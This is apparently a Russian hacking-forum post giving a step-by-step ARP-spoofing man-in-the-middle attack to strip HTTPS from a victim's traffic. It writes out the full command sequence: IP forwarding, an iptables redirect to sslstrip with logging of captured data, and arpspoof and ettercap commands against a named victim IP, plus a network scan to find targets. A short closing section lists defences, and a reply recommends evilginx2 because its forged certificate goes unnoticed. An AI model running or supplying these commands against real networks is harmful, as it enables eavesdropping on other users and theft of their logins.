Защити свои аккаунты качественными и приватными прокси форматов IPv4 и IPv6! - Proxy-seller

Перехватываем трафик HTTPS через ARP Spoofing

Wild65

Проверенный

ARP-spoofing (ARP — poisoning) — разновидность сетевой атаки типа MITM (англ. Man in the middle), применяемая в сетях с использованием протокола ARP. В основном применяется в сетях Ethernet. Атака основана на недостатках протокола ARP.


Подготовка и проведение атаки
Для проведения атаки будем использовать Ubuntu 16.04. Используемые инструменты:
  • ettercap или arpspoof
  • sslstrip
  • iptables
Все инструменты имеются в штатных репозиториях. Идея состоит в следующем: выполняется подмена arp-таблицы для жертвы (ettercap или arpspoof), трафик перенаправляется (iptables) на sslstrip с целью замены https на http. Все команды выполняются от имени суперпользователя. В терминале:
sudo su
Для начала нам необходимо активировать ip forwarding для пропуска пакетов через нашу систему. Если этого не сделать, то после выполнения arp poisoning, пакеты, предназначенные для компьютера жертвы, будут успешно потеряны. Выполняем команду:
echo 1 > /proc/sys/net/ipv4/ip_forward
Сформируем правила для iptables, по которым приходящий трафик на порт 80 будет перенаправлен на sslstrip:
iptables -t nat -A PREROUTING -p tcp —destination-port 80 -j REDIRECT —to-port 9999
Для таблицы nat цепочки PREROUTING в iptables создаётся правило, по которому все пакеты tcp:80 перенаправляются на порт 9999 (можно выбрать и любой другой порт в пределах 1024-65535). Запускаем sslstrip:
sslstrip -l 9999 -w Logfile.txt
Здесь указываем, что слушать необходимо порт 9999 и перехваченные данные записывать в Logfile.txt
Выполняем ARP poisoning. В случае с arpspoof:
arpspoof -t 192.168.1.43 192.168.1.1

192.168.1.43 — IP адрес жертвы
192.168.1.1 — IP адрес шлюза (шлюз можно узнать командой route)
В случае с ettercap:
ettercap -T -M arp -o /192.168.1.43// /192.168.1.1//

-T — текстовый интерфейс
-M arp — использование ARP MitM-атаки
-o — использование ip forward ядром ОС, а не самой программой.
Плюс использования ettercap в том, что её можно выполнять к любому количеству хостов в локальной сети. Если вы не знаете IP адрес жертвы, то можно просканировать локальную сеть:
ettercap -T -s «lq» nmap -sP 192.168.1.0/24
У каждого метода сканирования сети свои плюсы и минусы, для точности лучше использовать оба.
Результат.
Стоит отметить, что данный метод работает не всегда. Причиной тому — использование браузером статического списка сайтов HSTS.

Из других инструментов перехвата HTTPS трафика следует выделить bettercap и intercepter-ng.
Защита от ARP Spoofing
Существует несколько способов защиты от ARP Spoofing, рассмотрим некоторые из них.
Создание VLAN на коммутаторе
На коммутаторе создаётся VLAN, в котором находятся только сам коммутатор и конкретное сетевое устройство.
Создание шифрованных соединений (PPPoE, VPN и т.д.)
Этот способ подходит и для общественных сетей, ведь весь трафик проходит в зашифрованном виде и перехватить какие-либо пользовательские данные становится невозможно.


Данный метод не позволяют полностью перехватывать весь трафик в открытом виде, а также защититься от которого сравнительно легко.
 

quandiv

МЕСТНЫЙ

так можно же использовать и обычный wireshark) раз HTTPS протокол никак не подвергается прочтению
 

sakuraix86

Новичок

Советую evilginx2 для таких целей. Кривой сертификат не палится. И все автоматизированно.
Ну а вообще норм, расписал как надо +
 
Сверху Снизу